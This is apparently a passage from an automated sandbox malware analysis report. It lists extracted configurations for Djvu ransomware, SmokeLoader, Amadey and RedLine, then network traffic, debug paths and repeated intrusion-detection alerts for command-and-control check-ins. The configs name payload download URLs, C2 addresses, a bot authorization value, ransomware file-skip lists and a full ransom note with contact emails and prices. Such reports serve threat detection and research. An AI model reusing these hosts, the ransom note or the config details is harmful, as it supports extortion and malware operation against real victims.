                                Source: 00000010.00000002.824473088.0000000002050000.00000040.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Djvu {"Download URLs": ["http://uaery.top/dl/build2.exe", "http://ex3mall.com/files/1/build3.exe"], "C2 url": "http://ex3mall.com/lancer/get.php", "Ransom note file": "_readme.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-OKSOfVy04R\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@freshmail.top\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0625Sduef", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E:\\Users\\Public\\", "E:\\$Recycle.Bin\\", "E:\\$WINDOWS.~BT\\", "E:\\dell\\", "E:\\Intel\\", "E:\\MSOCache\\", "E:\\Program Files\\", "E:\\Program Files (x86)\\", "E:\\Games\\", "F:\\Users\\%username%\\AppData\\Roaming\\", "F:\\Users\\%username%\\AppData\\Local\\", "F:\\Wi
                                Source: 00000014.00000002.531842055.00000000020A1000.00000004.10000000.00040000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"C2 list": ["http://skinndia.com/tmp/", "http://cracker.biz/tmp/", "http://piratia-life.ru/tmp/"]}
                                Source: 32.2.8FF5.exe.2f0000.0.unpackMalware Configuration Extractor: Amadey {"C2 url": "45.32.200.113/mBsjv2swweP/index.php", "Version": "3.63"}
                                Source: 31.2.nbveek.exe.400000.0.unpackMalware Configuration Extractor: RedLine {"C2 url": ["82.115.223.15:15486"], "Bot Id": "555555555444", "Authorization Header": "fa8c71d3a5d6db7cd0d5296040b25f89"}
                                Source: Ej3vSx3p8Y.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                Source: C:\Users\user\Desktop\Ej3vSx3p8Y.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                                Source: unknownHTTPS traffic detected: 20.190.159.1:443 -> 192.168.2.4:49698 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 20.190.159.19:443 -> 192.168.2.4:49701 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 20.65.78.40:443 -> 192.168.2.4:49715 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 20.65.78.40:443 -> 192.168.2.4:49721 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 80.67.82.211:443 -> 192.168.2.4:49734 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 80.67.82.211:443 -> 192.168.2.4:49732 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 80.67.82.211:443 -> 192.168.2.4:49735 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 80.67.82.211:443 -> 192.168.2.4:49731 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 80.67.82.211:443 -> 192.168.2.4:49733 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 95.217.49.230:443 -> 192.168.2.4:49739 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 68.65.123.54:443 -> 192.168.2.4:49743 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 68.65.123.54:443 -> 192.168.2.4:49747 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 20.82.154.241:443 -> 192.168.2.4:49874 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 20.82.154.241:443 -> 192.168.2.4:49886 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 20.82.154.241:443 -> 192.168.2.4:49894 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 20.82.154.241:443 -> 192.168.2.4:49902 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 157.240.20.35:443 -> 192.168.2.4:49907 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 20.82.154.241:443 -> 192.168.2.4:49916 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 20.82.154.241:443 -> 192.168.2.4:49932 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 20.82.154.241:443 -> 192.168.2.4:49937 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 5.135.247.111:443 -> 192.168.2.4:49942 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 20.82.154.241:443 -> 192.168.2.4:49954 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 157.240.247.35:443 -> 192.168.2.4:49959 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 23.236.181.126:443 -> 192.168.2.4:49982 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.4:50039 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 157.240.247.35:443 -> 192.168.2.4:50356 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 157.240.214.35:443 -> 192.168.2.4:50474 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.4:50770 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 40.126.32.67:443 -> 192.168.2.4:50827 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 157.240.195.35:443 -> 192.168.2.4:50834 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 157.240.214.35:443 -> 192.168.2.4:50838 version: TLS 1.2
                                Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: 6D94.exe, 00000010.00000002.824473088.0000000002050000.00000040.00001000.00020000.00000000.sdmp
                                Source: Binary string: ^aC:\lodoxage\jozur-36\fet\gojo51\kecogojujo\vimevudujaf.pdb source: 7E5F.exe, 00000019.00000000.489319093.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, 7E5F.exe, 00000019.00000002.827915874.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, 7E5F.exe.3.dr
                                Source: Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: 6267.exe, 0000000D.00000002.485553488.00000000015AD000.00000004.00000020.00020000.00000000.sdmp, 6267.exe, 0000000D.00000000.474252459.00000000001EE000.00000002.00000001.01000000.00000007.sdmp, 6267.exe, 0000000D.00000002.484818816.00000000001EE000.00000002.00000001.01000000.00000007.sdmp, 65C3.exe, 0000000E.00000000.476326948.000000000106E000.00000002.00000001.01000000.00000008.sdmp, 65C3.exe, 0000000E.00000002.491303628.000000000106E000.00000002.00000001.01000000.00000008.sdmp, nbveek.exe, 0000000F.00000000.483640379.000000000119E000.00000002.00000001.01000000.00000009.sdmp, nbveek.exe, 0000000F.00000002.835389285.000000000119E000.00000002.00000001.01000000.00000009.sdmp, nbveek.exe, 00000011.00000000.486060263.000000000119E000.00000002.00000001.01000000.00000009.sdmp, nbveek.exe, 00000011.00000002.487757007.000000000119E000.00000002.00000001.01000000.00000009.sdmp, Legno.exe, 0000001C.00000002.535666056.0000000000FDE000.00000002.00000001.01000000.0000000F.sdmp, Legno.exe, 0000001C.00000000.494985153.0000000000FDE000.00000002.00000001.01000000.0000000F.sdmp, 8C99.exe, 0000001E.00000000.497110879.00000000000E0000.00000002.00000001.01000000.00000011.sdmp, 8C99.exe, 0000001E.00000002.523400669.00000000000E0000.00000002.00000001.01000000.00000011.sdmp, nbveek.exe, 0000001F.00000002.576827250.000000000119E000.00000002.00000001.01000000.00000009.sdmp, 8FF5.exe, 00000020.00000000.500023246.0000000000320000.00000002.00000001.01000000.00000014.sdmp, 8FF5.exe, 00000020.00000002.523719840.0000000000320000.00000002.00000001.01000000.00000014.sdmp, nbveek.exe, 00000025.00000002.523902619.0000000000370000.00000002.00000001.01000000.00000016.sdmp, nbveek.exe, 00000025.00000000.514227237.0000000000370000.00000002.00000001.01000000.00000016.sdmp, nbveek.exe, 00000026.00000000.514191687.0000000000370000.00000002.00000001.01000000.00000016.sdmp, nbveek.exe, 00000026.00000002.839290985.0000000000370000.00000002.00000001.01000000.00000016.sdmp, nbveek.exe, 00000027.00000002.842263496.0000000000E0E000.00000002.00000001.01000000.00000017.sdmp, nbveek.exe, 00000027.00000000.523581045.0000000000E0E000.00000002.00000001.01000000.00000017.sdmp, CEE7.exe, 0000002B.00000002.689486378.0000000004938000.00000004.00000800.00020000.00000000.sdmp, nbveek.exe.28.dr
                                Source: Binary string: C:\lodoxage\jozur-36\fet\gojo51\kecogojujo\vimevudujaf.pdb source: 7E5F.exe, 00000019.00000000.489319093.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, 7E5F.exe, 00000019.00000002.827915874.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, 7E5F.exe.3.dr
                                Source: Binary string: C:\cadof muk.pdb source: Ej3vSx3p8Y.exe
                                Source: Binary string: C:\ruko\kusugu8-fu.pdb source: 3320.exe.3.dr
                                Source: Binary string: >h6C:\ruko\kusugu8-fu.pdb source: 3320.exe.3.dr
                                Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: 6D94.exe, 00000010.00000002.824473088.0000000002050000.00000040.00001000.00020000.00000000.sdmp
                                Source: Binary string: 6C:\cadof muk.pdb source: Ej3vSx3p8Y.exe
                                Source: Binary string: UC:\kava72\hijirurelef\wayokowagohem1 cusewasuyu.pdb source: 79AB.exe, 00000014.00000000.487672492.0000000000401000.00000020.00000001.01000000.0000000B.sdmp
                                Source: Binary string: BC:\sibuzugegipu47 vicu.pdb source: 6D94.exe, 00000010.00000000.483776925.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, 6D94.exe, 00000010.00000002.819390818.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, 6D94.exe.3.dr
                                Source: Binary string: C:\kava72\hijirurelef\wayokowagohem1 cusewasuyu.pdb source: 79AB.exe, 00000014.00000000.487672492.0000000000401000.00000020.00000001.01000000.0000000B.sdmp
                                Source: Binary string: C:\sibuzugegipu47 vicu.pdb source: 6D94.exe, 00000010.00000000.483776925.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, 6D94.exe, 00000010.00000002.819390818.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, 6D94.exe.3.dr
                                Source: C:\Users\user\AppData\Local\Temp\6267.exeCode function: 13_2_001DF909 FindFirstFileExW,13_2_001DF909
                                Source: C:\Users\user\AppData\Local\Temp\65C3.exeCode function: 14_2_0105F909 FindFirstFileExW,14_2_0105F909
                                Source: C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exeCode function: 15_2_0118F909 FindFirstFileExW,15_2_0118F909

                                Networking

                                barindex
                                Source: C:\Windows\explorer.exeDomain query: potunulit.org
                                Source: C:\Windows\explorer.exeDomain query: polyzi.com
                                Source: C:\Windows\explorer.exeDomain query: vatra.at
                                Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 62.204.41.109 80
                                Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.168.2.4 80
                                Source: C:\Windows\explorer.exeNetwork Connect: 62.204.41.145 80Jump to behavior
                                Source: C:\Windows\explorer.exeDomain query: degroeneuitzender.nl
                                Source: C:\Windows\explorer.exeNetwork Connect: 194.135.33.28 80Jump to behavior
                                Source: C:\Windows\explorer.exeDomain query: lazydowns.com
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49740 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2838063 ETPRO TROJAN Amadey CnC Server Payload Response (exe) 62.204.41.109:80 -> 192.168.2.4:49740
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49749 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49750 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49751 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49752 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49753 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49754 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49756 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49758 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49759 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49760 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49762 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49763 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49764 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49765 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49766 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49767 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49768 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49769 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49770 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49772 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49773 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49774 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49775 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49776 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49777 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49778 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49779 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49780 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49781 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49782 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49783 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49790 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49792 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49795 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49801 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49802 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49805 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49813 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49819 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49822 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49824 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49825 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49827 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49828 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49829 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49831 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49832 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49833 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49834 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49835 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49837 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49838 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49840 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49842 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49841 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49844 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49845 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49846 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49847 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49848 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49849 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49851 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49850 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49852 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49853 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49856 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49855 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49858 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49857 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49861 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49860 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49862 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49863 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49865 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49866 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49868 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49869 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49870 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49871 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49873 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49875 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49878 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49877 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2851815 ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 192.168.2.4:49876 -> 222.236.49.124:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49880 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49879 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49881 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49882 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49884 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49885 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49888 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49887 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49891 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49890 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49892 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49893 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49895 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49896 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49898 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49899 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49900 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49901 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49904 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49905 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49906 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49908 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49909 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49911 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49912 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49915 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49914 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49918 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49917 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49921 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49919 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2851815 ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 192.168.2.4:49920 -> 37.34.248.24:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49922 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49923 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49924 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49925 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49926 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49927 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49928 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49931 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49933 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2851815 ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 192.168.2.4:49930 -> 211.40.39.251:80
